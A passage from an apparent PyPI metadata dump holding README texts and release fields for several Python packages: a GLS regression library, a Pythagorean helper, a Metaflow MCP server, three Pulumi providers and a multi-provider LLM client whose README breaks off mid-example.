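Omega = (1 - rho) * np.eye(n) + rho * np.ones((n, n))
y = X @ beta_true + np.linalg.cholesky(Omega) @ rng.normal(size=n)

# beta = (X' Omega^-1 X)^-1 X' Omega^-1 y, via solves instead of explicit inverses
Oi_X = np.linalg.solve(Omega, X)
beta_hat = np.linalg.solve(X.T @ Oi_X, Oi_X.T @ y)

resid = y - X @ beta_hat
sigma2 = resid @ np.linalg.solve(Omega, resid) / (n - X.shape[1])
```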
### Key Design Decisions
**Spherical parametrization** for `CorSymm`: The unstructured correlation matrix is parametrized via angles that map to a Cholesky factor, guaranteeing positive-definiteness without constrained optimization. Based on [Pinheiro & Bates (1996)](https://doi.org/10.1007/BF00140873).
**Analytic inverses**: AR(1) and compound symmetry correlation matrices have O(m) analytic inverses and O(1) log-determinants, avoiding dense O(m^3) solves.
**Batched computation**: Balanced panels (equal group sizes) use batched NumPy operations — a single matrix multiply across all groups — instead of per-group loops.
**Block-diagonal inversion**: Omega is inverted per-group (O(n*m^3)) rather than as a full matrix (O(N^3)), where n = number of groups and m = group size.
**Thread-level parallelism**: Pass `n_jobs=-1` to `.fit()` to distribute group-level computations across CPU cores via a thread pool. Useful for large unbalanced panels.
**REML**: Restricted maximum likelihood integrates out the fixed effects from the likelihood, giving unbiased variance estimates. This is the default, matching R's `nlme::gls()`.
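The AR(1) claim can be checked directly: the inverse of the AR(1) correlation matrix is tridiagonal with closed-form entries, and its determinant is (1 - phi^2)^(m-1). A NumPy verification (independent of the package):

```python
import numpy as np

def ar1_inverse(phi: float, m: int) -> np.ndarray:
    """Tridiagonal inverse of the AR(1) correlation matrix, built in O(m)."""
    d = 1.0 / (1.0 - phi**2)
    inv = np.zeros((m, m))
    np.fill_diagonal(inv, (1.0 + phi**2) * d)
    inv[0, 0] = inv[-1, -1] = d            # end points differ from the interior
    idx = np.arange(m - 1)
    inv[idx, idx + 1] = inv[idx + 1, idx] = -phi * d
    return inv

phi, m = 0.6, 5
i = np.arange(m)
R = phi ** np.abs(np.subtract.outer(i, i))   # dense AR(1) matrix for comparison
assert np.allclose(ar1_inverse(phi, m) @ R, np.eye(m))
```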
## Formula Syntax
Powered by [formulaic](https://github.com/matthewwardrop/formulaic), supporting:
```python
# Simple linear
"y ~ x1 + x2"
# Categorical variables
"y ~ C(treatment)"
# Interactions
"y ~ x1 * x2" # x1 + x2 + x1:x2
"y ~ x1 : x2" # just the interaction
# Transformations
"y ~ np.log(x1) + x2"
# Remove intercept
"y ~ x1 + x2 - 1"
```
## ML vs. REML
| | ML | REML |
|---|---|---|
| Variance estimate | Biased (divides by N) | Unbiased (divides by N-k) |
| Default in R's gls | No | Yes |
| Default here | No | Yes |
| Use for model comparison | AIC/BIC of nested & non-nested models | Only models with same fixed effects |
| `method=` | `"ML"` | `"REML"` |
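The denominator difference is the familiar one from the sample-variance estimator. A toy NumPy illustration for the OLS special case (Omega = I):

```python
import numpy as np

rng = np.random.default_rng(42)
n, k = 100, 3
X = np.column_stack([np.ones(n), rng.normal(size=(n, k - 1))])
y = X @ np.array([1.0, 2.0, -1.0]) + rng.normal(size=n)

beta, *_ = np.linalg.lstsq(X, y, rcond=None)
rss = float(np.sum((y - X @ beta) ** 2))

sigma2_ml = rss / n          # ML-style denominator: biased downward
sigma2_reml = rss / (n - k)  # REML-style denominator: unbiased here
```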
## Translating from R
### R code → Python equivalent
```r
# R
library(nlme)
m <- gls(y ~ x1 + x2,
data = df,
correlation = corAR1(form = ~1|subject),
weights = varIdent(form = ~1|group),
method = "REML")
summary(m)
intervals(m)
```
```python
# Python
from python_gls import GLS
from python_gls.correlation import CorAR1
from python_gls.variance import VarIdent
r = GLS.from_formula(
"y ~ x1 + x2",
data=df,
correlation=CorAR1(),
variance=VarIdent("group"),
groups="subject",
method="REML",
).fit()
print(r.summary())
print(r.conf_int())
```
### Parameter name mapping
| R | Python | Notes |
|---|---|---|
| `corAR1(form=~1\|subject)` | `CorAR1(), groups="subject"` | Groups specified at model level |
| `corCompSymm(form=~1\|id)` | `CorCompSymm(), groups="id"` | |
| `corSymm(form=~1\|id)` | `CorSymm(), groups="id"` | |
| `corExp(form=~x+y\|id)` | `CorExp(); cor.set_coordinates(...)` | Coordinates set per group |
| `varIdent(form=~1\|group)` | `VarIdent("group")` | Group variable as string |
| `varPower(form=~fitted)` | `VarPower("fitted")` | Covariate name as string |
| `method="REML"` | `method="REML"` | Same |
## Dependencies
- **numpy** >= 1.24
- **scipy** >= 1.10
- **pandas** >= 2.0
- **formulaic** >= 1.0
## Testing
```bash
pip install -e ".[dev]"
pytest
```
## License
MIT
| text/markdown | Bruno Abrahao | null | null | null | null | null | [
"Development Status :: 3 - Alpha",
"Intended Audience :: Science/Research",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Topic :: Scientific/Engineering :: Mathematics"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"numpy>=1.24",
"scipy>=1.10",
"pandas>=2.0",
"formulaic>=1.0",
"pytest>=7.0; extra == \"dev\"",
"pytest-cov>=4.0; extra == \"dev\"",
"statsmodels>=0.14; extra == \"dev\""
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:54:20.478469 | python_gls-0.2.0.tar.gz | 46,888 | 05/16/db0ccfaade88a003e36f09556874a2e8f974fe29e83197b941f5f4774a47/python_gls-0.2.0.tar.gz | source | sdist | null | false | bcd4b9f47f99c5888aea5186e60453e7 | cd5acb27a72d78c43cc99bd0922adcb91bad5e359e1db5b7885b5bdfcd2ad200 | 0516db0ccfaade88a003e36f09556874a2e8f974fe29e83197b941f5f4774a47 | MIT | [
"LICENSE"
] | 229 |
2.4 | pythagore | 1.3.1 | allows you to solve the Pythagorean theorem in Python | # pythagore
allows you to solve the Pythagorean theorem in Python
## ✨ Features
- Calculate the hypotenuse from the two adjacent sides (`a` and `b`)
- Calculate a missing side if the hypotenuse and another side are known
- Check if a triangle is a right triangle by applying the Pythagorean theorem
## 🔧 Installation
You can install this module with `pip`:
```bash
pip install pythagore
```
## 🚀 Usage
Here is an example of using the module:
```python
from pythagore import Pythagore
pythagore = Pythagore()
a = 3
b = 4
hypotenuse = pythagore.hypotenus(a, b)  # length of the hypotenuse
if pythagore.is_rectangle(hypotenuse, a, b):
    print("the triangle is indeed right-angled according to the Pythagorean theorem")
else:
    print("the triangle is not a right triangle")
find_missing_side = pythagore.adjacent_side(hypotenuse, a)  # 4
if find_missing_side == b:
    print(f"the missing side is b and its value is: {find_missing_side}")
print()
print(f"hypotenuse : {hypotenuse}\nside_a : {a}\nside_b : {b}")
```
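For reference, the same three computations can be written with the standard library alone (this sketch does not use the package):

```python
import math

a, b = 3, 4
hypotenuse = math.hypot(a, b)                         # sqrt(a**2 + b**2) -> 5.0
missing_side = math.sqrt(hypotenuse**2 - a**2)        # recover b -> 4.0
is_right = math.isclose(hypotenuse**2, a**2 + b**2)   # Pythagorean check -> True
```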
## ❗ Prerequisites
- Python >= 3.13.0
## 📄 License
This project is distributed under the MIT License.
See the LICENSE file for more information.
[LICENSE](./LICENSE)
| text/markdown | Tina | tina.xytrfgthuji1348@gmail.com | null | null | MIT | null | [
"Programming Language :: Python :: 3",
"License :: OSI Approved :: MIT License",
"Operating System :: OS Independent",
"Intended Audience :: Developers",
"Topic :: Scientific/Engineering :: Mathematics"
] | [] | https://github.com/Tina-1300/pythagore | null | >=3.13.0 | [] | [] | [] | [] | [] | [] | [] | [] | twine/6.2.0 CPython/3.13.0 | 2026-02-20T06:54:09.122628 | pythagore-1.3.1.tar.gz | 3,524 | 70/c6/9320094b0af5331d7d5e851018cb2ff72d9324f0f4a5dc7ecbca0d88c2ac/pythagore-1.3.1.tar.gz | source | sdist | null | false | c6d806b5d4eafd17b86d2ef0ca49591a | bfe10f67568df6283dcbc9311b84a416ea19a2344aa1afdc70e418c7c11c7c00 | 70c69320094b0af5331d7d5e851018cb2ff72d9324f0f4a5dc7ecbca0d88c2ac | null | [
"LICENSE"
] | 225 |
2.4 | metaflow-mcp-server | 0.1.2 | MCP server for Metaflow -- expose flow runs, logs, and artifacts as tools for AI coding agents | # Metaflow MCP Server
[](https://github.com/npow/metaflow-mcp-server/actions/workflows/ci.yml)
[](https://pypi.org/project/metaflow-mcp-server/)
[](https://pypi.org/project/metaflow-mcp-server/)
[](LICENSE)
[](https://modelcontextprotocol.io/)
Give your coding agent superpowers over your Metaflow workflows. Instead of writing throwaway scripts to check run status or dig through logs, just ask -- your agent will figure out the rest.
Works with any Metaflow backend: local, S3, Azure, GCS, or Netflix internal.
<p align="center">
<img src="demo/demo.gif" alt="demo" width="800">
</p>
## Tools
| Tool | Description |
|------|-------------|
| `get_config` | What backend am I connected to? |
| `search_runs` | Find recent runs of any flow |
| `get_run` | Step-by-step breakdown of a run |
| `get_task_logs` | Pull stdout/stderr from a task |
| `list_artifacts` | What did this step produce? |
| `get_artifact` | Grab an artifact's value |
| `get_latest_failure` | What broke and why? |
## Quickstart
```bash
pip install metaflow-mcp-server
claude mcp add --scope user metaflow -- metaflow-mcp-server
```
That's it. Restart Claude Code and start asking questions about your flows.
If Metaflow lives in a specific venv, point to it:
```bash
claude mcp add --scope user metaflow -- /path/to/venv/bin/metaflow-mcp-server
```
For other MCP clients, the server speaks stdio: `metaflow-mcp-server`
## How it works
Wraps the Metaflow client API. The server uses whatever backend your Metaflow installation is pointed at -- no separate config needed. Sets `namespace(None)` at startup so production runs (Argo, Step Functions, Maestro) are visible alongside your dev runs.
Starts once per session, communicates over stdin/stdout. No daemon, no port.
## License
Apache-2.0
| text/markdown | null | null | null | null | Apache-2.0 | null | [
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"License :: OSI Approved :: Apache Software License"
] | [] | null | null | >=3.10 | [] | [] | [] | [
"metaflow>=2.12.0",
"mcp>=1.0.0",
"pytest>=7.0.0; extra == \"test\""
] | [] | [] | [] | [] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T06:53:25.934428 | metaflow_mcp_server-0.1.2.tar.gz | 9,711 | a0/df/7a72aa7b6fd505871a0e88f8677ea94c30b45d441a4ca37ad2dc6105fec1/metaflow_mcp_server-0.1.2.tar.gz | source | sdist | null | false | d4a90ee92171a528e76b0b4f1136d82c | a7023a70c5b2a0a7709d26a5020c6e025270dc30d55346890959a126460956d0 | a0df7a72aa7b6fd505871a0e88f8677ea94c30b45d441a4ca37ad2dc6105fec1 | null | [
"LICENSE"
] | 238 |
2.4 | pulumi-venafi | 1.13.0a1771570021 | A Pulumi package for creating and managing venafi cloud resources. | [](https://github.com/pulumi/pulumi-venafi/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/venafi)
[](https://pypi.org/project/pulumi-venafi)
[](https://badge.fury.io/nu/pulumi.venafi)
[](https://pkg.go.dev/github.com/pulumi/pulumi-venafi/sdk/go)
[](https://github.com/pulumi/pulumi-venafi/blob/master/LICENSE)
# Venafi Resource Provider
The Venafi Resource Provider lets you manage Venafi resources.
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
$ npm install @pulumi/venafi
or `yarn`:
$ yarn add @pulumi/venafi
### Python
To use from Python, install using `pip`:
$ pip install pulumi_venafi
### Go
To use from Go, use `go get` to grab the latest version of the library
$ go get github.com/pulumi/pulumi-venafi/sdk
### .NET
To use from .NET, install using `dotnet add package`:
$ dotnet add package Pulumi.Venafi
## Configuration
The following configuration points are available:
- `venafi:zone` - (Optional) Zone ID for Venafi Cloud or policy folder for Venafi Platform.
It can also be sourced from the `VENAFI_ZONE` environment variable.
- `venafi:url` - (Optional) Venafi URL (e.g. `https://tpp.venafi.example`). It can also be sourced
from the `VENAFI_URL` environment variable.
- `venafi:accessToken` - (Optional) authentication token for the API Application
(applies only to Venafi Platform). It can also be sourced from the `VENAFI_TOKEN` environment variable.
- `venafi:apiKey` - (Optional) REST API key for authentication (applies only to Venafi Cloud).
It can also be sourced from the `VENAFI_API` environment variable.
- `venafi:tppUsername` - (Optional) WebSDK account username for authentication (applies only to Venafi Platform).
It can also be sourced from the `VENAFI_USER` environment variable.
- `venafi:tppPassword` - (Optional) WebSDK account password for authentication (applies only to Venafi Platform).
It can also be sourced from the `VENAFI_PASS` environment variable.
- `venafi:trustBundle` - (Optional) PEM trust bundle for Venafi Platform server certificate.
- `venafi:devMode` - (Optional) When `true` will test the provider without connecting to Venafi Platform or Venafi Cloud.
It can also be sourced from the `VENAFI_DEVMODE` environment variable.
## Reference
For further information, please visit [the Venafi provider docs](https://www.pulumi.com/docs/intro/cloud-providers/venafi)
or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/venafi).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, venafi | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-venafi"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:53:24.702655 | pulumi_venafi-1.13.0a1771570021.tar.gz | 28,862 | 8e/68/f325fb7817ddff02109aa6f1a235c9062ebe5c86c7a0659dcb5bfa5647a7/pulumi_venafi-1.13.0a1771570021.tar.gz | source | sdist | null | false | a56625dcbe6215d042324432ee83dba3 | 71b4f7dcf437a0e81de8394c1dea35eab4e57b76337d45adf7d3558e658991e3 | 8e68f325fb7817ddff02109aa6f1a235c9062ebe5c86c7a0659dcb5bfa5647a7 | null | [] | 222 |
2.4 | pulumi-xyz | 1.0.0a1771569941 | A Pulumi package for creating and managing xyz cloud resources. | # Terraform Bridge Provider Boilerplate
This repository is the template for authoring a Pulumi package from an existing Terraform provider as part of the guide for [authoring and publishing Pulumi packages](https://www.pulumi.com/docs/iac/packages-and-automation/pulumi-packages/authoring/).
This repository is initially set up as a fictitious provider named "xyz" to demonstrate a resource, a data source and configuration derived from the [github.com/pulumi/terraform-provider-xyz provider](https://github.com/pulumi/terraform-provider-xyz).
Read the [setup instructions](SETUP.md) for step-by-step instructions on how to bridge a new provider and refer to our complete docs [guide for authoring and publishing a Pulumi Package](https://www.pulumi.com/docs/iac/packages-and-automation/pulumi-packages/authoring/).
# Xyz Resource Provider
The Xyz Resource Provider lets you manage [Xyz](http://example.com) resources.
## Installing
This package is available for several languages/platforms:
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/xyz
```
or `yarn`:
```bash
yarn add @pulumi/xyz
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_xyz
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-xyz/sdk/go/...
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Xyz
```
## Configuration
The following configuration points are available for the `xyz` provider:
- `xyz:region` (environment: `XYZ_REGION`) - the region in which to deploy resources
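Either mechanism works per stack; for example (region name below is a placeholder):

```shell
pulumi config set xyz:region us-west-2
# or equivalently:
export XYZ_REGION=us-west-2
```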
## Reference
For detailed reference documentation, please visit [the Pulumi registry](https://www.pulumi.com/registry/packages/xyz/api-docs/).
| text/markdown | null | null | null | null | Apache-2.0 | xyz, category/cloud | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://www.pulumi.com",
"Repository, https://github.com/pulumi/pulumi-xyz"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:51:30.528896 | pulumi_xyz-1.0.0a1771569941.tar.gz | 9,944 | af/60/bd81a2fd99258e41726e324275ff37a4c74cdd45e3ed9dfe69b39ec3750e/pulumi_xyz-1.0.0a1771569941.tar.gz | source | sdist | null | false | c0ffe4e841b9e9e3848415e4ce2e900d | f41348cc175210025f356009c56af5f4c00774ce732aca447d7e56210fb5a1ca | af60bd81a2fd99258e41726e324275ff37a4c74cdd45e3ed9dfe69b39ec3750e | null | [] | 214 |
2.4 | pulumi-spotinst | 3.129.0a1771569770 | A Pulumi package for creating and managing spotinst cloud resources. | [](https://github.com/pulumi/pulumi-spotinst/actions)
[](https://slack.pulumi.com)
[](https://www.npmjs.com/package/@pulumi/spotinst)
[](https://pypi.org/project/pulumi-spotinst)
[](https://badge.fury.io/nu/pulumi.spotinst)
[](https://pkg.go.dev/github.com/pulumi/pulumi-spotinst/sdk/v3/go)
[](https://github.com/pulumi/pulumi-spotinst/blob/master/LICENSE)
# Spotinst Resource Provider
The Spotinst resource provider for Pulumi lets you manage Spotinst resources in your cloud programs. To use
this package, please [install the Pulumi CLI first](https://pulumi.io/).
## Installing
This package is available in many languages in the standard packaging formats.
### Node.js (JavaScript/TypeScript)
To use from JavaScript or TypeScript in Node.js, install using either `npm`:
```bash
npm install @pulumi/spotinst
```
or `yarn`:
```bash
yarn add @pulumi/spotinst
```
### Python
To use from Python, install using `pip`:
```bash
pip install pulumi_spotinst
```
### Go
To use from Go, use `go get` to grab the latest version of the library:
```bash
go get github.com/pulumi/pulumi-spotinst/sdk/v3
```
### .NET
To use from .NET, install using `dotnet add package`:
```bash
dotnet add package Pulumi.Spotinst
```
## Configuration
The following configuration points are available for the `spotinst` provider:
- `spotinst:account` (environment: `SPOTINST_ACCOUNT`) - the account for `spotinst`
- `spotinst:token` (environment: `SPOTINST_TOKEN`) - the api token for `spotinst`
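These can be set per stack with `pulumi config set` (the account ID below is a placeholder; `--secret` keeps the token encrypted in the stack config):

```shell
pulumi config set spotinst:account act-12345678
pulumi config set --secret spotinst:token '<spotinst-api-token>'
```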
## Reference
For further information, please visit [the Spotinst provider docs](https://www.pulumi.com/docs/intro/cloud-providers/spotinst) or for detailed reference documentation, please visit [the API docs](https://www.pulumi.com/docs/reference/pkg/spotinst).
| text/markdown | null | null | null | null | Apache-2.0 | pulumi, spotinst | [] | [] | null | null | >=3.9 | [] | [] | [] | [
"parver>=0.2.1",
"pulumi<4.0.0,>=3.165.0",
"semver>=2.8.1",
"typing-extensions<5,>=4.11; python_version < \"3.11\""
] | [] | [] | [] | [
"Homepage, https://pulumi.io",
"Repository, https://github.com/pulumi/pulumi-spotinst"
] | twine/6.2.0 CPython/3.11.8 | 2026-02-20T06:50:53.802020 | pulumi_spotinst-3.129.0a1771569770.tar.gz | 462,481 | 0e/7f/3d7e995ec81323e32e98dc90d4c0dbc1172cd22721ab9ec449be9f28ff1f/pulumi_spotinst-3.129.0a1771569770.tar.gz | source | sdist | null | false | 0e5f61fbefe47e7296d3d5df739882c5 | 1c2bd9784a3cd2112a3555df2fbb1da7ffdb3517c2af1ed74026d769e5178be3 | 0e7f3d7e995ec81323e32e98dc90d4c0dbc1172cd22721ab9ec449be9f28ff1f | null | [] | 222 |
2.4 | jentis-llmkit | 1.0.3 | A unified Python interface for multiple Large Language Model (LLM) providers including Google Gemini, Anthropic Claude, OpenAI GPT, xAI Grok, Azure OpenAI, and Ollama | # Jentis LLM Kit
A unified Python interface for multiple Large Language Model (LLM) providers. Access Google Gemini, Anthropic Claude, OpenAI GPT, xAI Grok, Azure OpenAI, and Ollama through a single, consistent API.
## Features
- 🔄 **Unified Interface**: One API for all LLM providers
- 🚀 **Easy to Use**: Simple `init_llm()` function to get started
- 📡 **Streaming Support**: Real-time response streaming for all providers
- 📊 **Token Tracking**: Consistent token usage reporting across providers
- 🔧 **Flexible Configuration**: Provider-specific parameters when needed
- 🛡️ **Error Handling**: Comprehensive exception hierarchy for debugging
## Supported Providers
| Provider | Aliases | Models |
|----------|---------|--------|
| Google Gemini | `google`, `gemini` | gemini-2.0-flash-exp, gemini-1.5-pro, etc. |
| Anthropic Claude | `anthropic`, `claude` | claude-3-5-sonnet-20241022, claude-3-5-haiku-20241022 |
| OpenAI | `openai`, `gpt` | gpt-4o, gpt-4o-mini, gpt-4-turbo |
| xAI Grok | `grok`, `xai` | grok-2-latest, grok-2-vision-latest |
| Azure OpenAI | `azure`, `microsoft` | Your deployment names |
| Ollama Cloud | `ollama-cloud` | llama2, mistral, codellama, etc. |
| Ollama Local | `ollama`, `ollama-local` | Any locally installed model |
| Vertex AI | `vertexai`, `vertex-ai`, `vertex` | Any Vertex AI Model Garden model |
## Installation
```bash
# Install the base package
pip install jentis-llmkit
# Or install with provider-specific dependencies
pip install jentis-llmkit[google] # For Google Gemini
pip install jentis-llmkit[anthropic] # For Anthropic Claude
pip install jentis-llmkit[openai] # For OpenAI, Grok, Azure
pip install jentis-llmkit[ollama] # For Ollama (Cloud & Local)
pip install jentis-llmkit[all] # Install all providers
# Vertex AI requires no pip packages — only gcloud CLI
```
## Quick Start
### Basic Usage
```python
from jentis.llmkit import init_llm
# Initialize OpenAI GPT-4 (requires OpenAI API key)
llm = init_llm(
provider="openai",
model="gpt-4o",
api_key="sk-proj-xxxxxxxxxxxx" # Your OpenAI API key
)
# Generate a response
response = llm.generate_response("What is Python?")
print(response)
```
### Streaming Responses
```python
from jentis.llmkit import init_llm
# Each provider requires its own API key
llm = init_llm(
provider="openai",
model="gpt-4o",
api_key="sk-proj-xxxxxxxxxxxx" # OpenAI-specific key
)
# Stream the response
for chunk in llm.generate_response_stream("Write a short story about AI"):
print(chunk, end='', flush=True)
```
## Provider Examples
### Google Gemini
```python
from jentis.llmkit import init_llm
# Requires Google AI Studio API key
llm = init_llm(
provider="google",
model="gemini-2.0-flash-exp",
api_key="AIzaSyxxxxxxxxxxxxxxxxxxxxxxxxx", # Google API key
temperature=0.7,
max_tokens=1024
)
response = llm.generate_response("Explain quantum computing")
print(response)
```
### Anthropic Claude
```python
from jentis.llmkit import init_llm
# Requires Anthropic API key
llm = init_llm(
provider="anthropic",
model="claude-3-5-sonnet-20241022",
api_key="sk-ant-api03-xxxxxxxxxxxxxxxxx", # Anthropic API key
max_tokens=2048,
temperature=0.8
)
response = llm.generate_response("Write a haiku about programming")
print(response)
```
### OpenAI GPT
```python
from jentis.llmkit import init_llm
# Requires OpenAI API key
llm = init_llm(
provider="openai",
model="gpt-4o",
api_key="sk-proj-xxxxxxxxxxxxxxxxxxxx", # OpenAI API key
temperature=0.9,
max_tokens=1500,
frequency_penalty=0.5,
presence_penalty=0.3
)
response = llm.generate_response("Design a simple REST API")
print(response)
```
### xAI Grok
```python
from jentis.llmkit import init_llm
# Requires xAI API key
llm = init_llm(
provider="grok",
model="grok-2-latest",
api_key="xai-xxxxxxxxxxxxxxxxxxxxxxxx", # xAI API key
temperature=0.7
)
response = llm.generate_response("What's happening in tech?")
print(response)
```
### Azure OpenAI
```python
from jentis.llmkit import init_llm
# Requires Azure OpenAI API key and endpoint
llm = init_llm(
provider="azure",
model="gpt-4o",
api_key="a1b2c3d4e5f6xxxxxxxxxxxx", # Azure API key
azure_endpoint="https://your-resource.openai.azure.com/",
deployment_name="gpt-4o-deployment",
api_version="2024-08-01-preview",
temperature=0.7
)
response = llm.generate_response("Explain Azure services")
print(response)
```
### Ollama Local
```python
from jentis.llmkit import init_llm
# No API key needed for local Ollama
llm = init_llm(
provider="ollama",
model="llama2",
temperature=0.7
)
response = llm.generate_response("Hello, Ollama!")
print(response)
```
### Ollama Cloud
```python
from jentis.llmkit import init_llm
# Requires Ollama Cloud API key
llm = init_llm(
provider="ollama-cloud",
model="llama2",
api_key="ollama_xxxxxxxxxxxxxxxx", # Ollama Cloud API key
host="https://ollama.com"
)
response = llm.generate_response("Explain machine learning")
print(response)
```
### Vertex AI (Model Garden)
```python
from jentis.llmkit import init_llm
# Uses gcloud CLI for authentication (no API key needed)
llm = init_llm(
provider="vertexai",
model="moonshotai/kimi-k2-thinking-maas",
project_id="gen-lang-client-0152852093",
region="global",
temperature=0.6,
max_tokens=8192
)
response = llm.generate_response("What is quantum computing?")
print(response)
```
## Advanced Usage
### Using Function-Based API with Metadata
If you need detailed metadata (token usage, model info), import the provider-specific functions:
```python
from jentis.llmkit.Openai import openai_llm
result = openai_llm(
prompt="What is AI?",
model="gpt-4o",
api_key="sk-proj-xxxxxxxxxxxxxxxxxxxx", # Your OpenAI API key
temperature=0.7
)
print(f"Content: {result['content']}")
print(f"Model: {result['model']}")
print(f"Input tokens: {result['usage']['input_tokens']}")
print(f"Output tokens: {result['usage']['output_tokens']}")
print(f"Total tokens: {result['usage']['total_tokens']}")
```
**Other Providers:**
```python
# Google Gemini
from jentis.llmkit.Google import google_llm
result = google_llm(prompt="...", model="gemini-2.0-flash-exp", api_key="...")
# Anthropic Claude
from jentis.llmkit.Anthropic import anthropic_llm
result = anthropic_llm(prompt="...", model="claude-3-5-sonnet-20241022", api_key="...", max_tokens=1024)
# Grok
from jentis.llmkit.Grok import grok_llm
result = grok_llm(prompt="...", model="grok-2-latest", api_key="...")
# Azure OpenAI
from jentis.llmkit.Microsoft import azure_llm
result = azure_llm(prompt="...", deployment_name="gpt-4o", azure_endpoint="...", api_key="...")
# Ollama Cloud
from jentis.llmkit.Ollamacloud import ollama_cloud_llm
result = ollama_cloud_llm(prompt="...", model="llama2", api_key="...")
# Ollama Local
from jentis.llmkit.Ollamalocal import ollama_local_llm
result = ollama_local_llm(prompt="...", model="llama2")
# Vertex AI
from jentis.llmkit.Vertexai import vertexai_llm
result = vertexai_llm(prompt="...", model="google/gemini-2.0-flash", project_id="my-project")
```
**Streaming with Functions:**
```python
from jentis.llmkit.Openai import openai_llm_stream
for chunk in openai_llm_stream(
prompt="Write a story",
model="gpt-4o",
api_key="sk-proj-xxxxxxxxxxxxxxxxxxxx"
):
print(chunk, end='', flush=True)
```
### Custom Configuration
```python
from jentis.llmkit import init_llm
llm = init_llm(
provider="openai",
model="gpt-4o",
api_key="sk-proj-xxxxxxxxxxxxxxxxxxxx", # Your OpenAI API key
temperature=0.8,
top_p=0.9,
max_tokens=2000,
max_retries=5,
timeout=60.0,
backoff_factor=1.0,
frequency_penalty=0.5,
presence_penalty=0.3
)
```
## Parameters
### Common Parameters
All providers support these parameters:
| Parameter | Type | Default | Description |
|-----------|------|---------|-------------|
| `provider` | str | **Required** | Provider name or alias |
| `model` | str | **Required** | Model identifier |
| `api_key` | str | None | API key (env var if not provided) |
| `temperature` | float | None | Randomness (0.0-2.0) |
| `top_p` | float | None | Nucleus sampling (0.0-1.0) |
| `max_tokens` | int | None | Maximum tokens to generate |
| `timeout` | float | 30.0 | Request timeout (seconds) |
| `max_retries` | int | 3 | Retry attempts |
| `backoff_factor` | float | 0.5 | Exponential backoff factor |
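The README does not spell out the retry schedule; a common interpretation of `backoff_factor` is an exponential delay of `backoff_factor * 2**attempt` per retry. A minimal sketch under that assumption (`backoff_delays` is a hypothetical helper, not part of the package):

```python
def backoff_delays(max_retries: int = 3, backoff_factor: float = 0.5) -> list[float]:
    """Hypothetical schedule: delay = backoff_factor * 2**attempt for each retry."""
    return [backoff_factor * (2 ** attempt) for attempt in range(max_retries)]

# With the defaults above (max_retries=3, backoff_factor=0.5):
print(backoff_delays())  # [0.5, 1.0, 2.0]
```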
### Provider-Specific Parameters
**OpenAI & Grok:**
- `frequency_penalty`: Penalty for token frequency (0.0-2.0)
- `presence_penalty`: Penalty for token presence (0.0-2.0)
**Azure OpenAI:**
- `azure_endpoint`: Azure endpoint URL (**Required**)
- `deployment_name`: Deployment name (defaults to model)
- `api_version`: API version (default: "2024-08-01-preview")
**Ollama (Cloud & Local):**
- `host`: Host URL (Cloud: "https://ollama.com", Local: "http://localhost:11434")
## Environment Variables
**Each provider uses its own environment variable for API keys.** Set them to avoid hardcoding:
```bash
# Google Gemini
export GOOGLE_API_KEY="AIzaSyxxxxxxxxxxxxxxxxxxxxxxxxx"
# Anthropic Claude
export ANTHROPIC_API_KEY="sk-ant-api03-xxxxxxxxxxxxxxxxx"
# OpenAI
export OPENAI_API_KEY="sk-proj-xxxxxxxxxxxxxxxxxxxx"
# xAI Grok
export XAI_API_KEY="xai-xxxxxxxxxxxxxxxxxxxxxxxx"
# Azure OpenAI
export AZURE_OPENAI_API_KEY="a1b2c3d4e5f6xxxxxxxxxxxx"
export AZURE_OPENAI_ENDPOINT="https://your-resource.openai.azure.com/"
# Ollama Cloud
export OLLAMA_API_KEY="ollama_xxxxxxxxxxxxxxxx"
# Vertex AI (uses gcloud auth, or set token explicitly)
export VERTEX_AI_ACCESS_TOKEN="ya29.xxxxx..."
export VERTEX_AI_PROJECT_ID="your-project-id"
```
Then initialize without api_key parameter:
```python
from jentis.llmkit import init_llm
# OpenAI - reads from OPENAI_API_KEY environment variable
llm = init_llm(provider="openai", model="gpt-4o")
# Google - reads from GOOGLE_API_KEY environment variable
llm = init_llm(provider="google", model="gemini-2.0-flash-exp")
# Anthropic - reads from ANTHROPIC_API_KEY environment variable
llm = init_llm(provider="anthropic", model="claude-3-5-sonnet-20241022")
# Vertex AI - reads from VERTEX_AI_PROJECT_ID, authenticates via gcloud
llm = init_llm(provider="vertexai", model="google/gemini-2.0-flash")
```
## Methods
All initialized LLM instances have two methods:
### `generate_response(prompt: str) -> str`
Generate a complete response.
```python
response = llm.generate_response("Your prompt here")
print(response) # String output
```
### `generate_response_stream(prompt: str) -> Generator`
Stream the response in real-time.
```python
for chunk in llm.generate_response_stream("Your prompt here"):
print(chunk, end='', flush=True)
```
## Error Handling
```python
from jentis.llmkit import init_llm
try:
llm = init_llm(
provider="openai",
model="gpt-4o",
api_key="sk-invalid-key-xxxxxxxxxx" # Wrong API key
)
response = llm.generate_response("Test")
except ValueError as e:
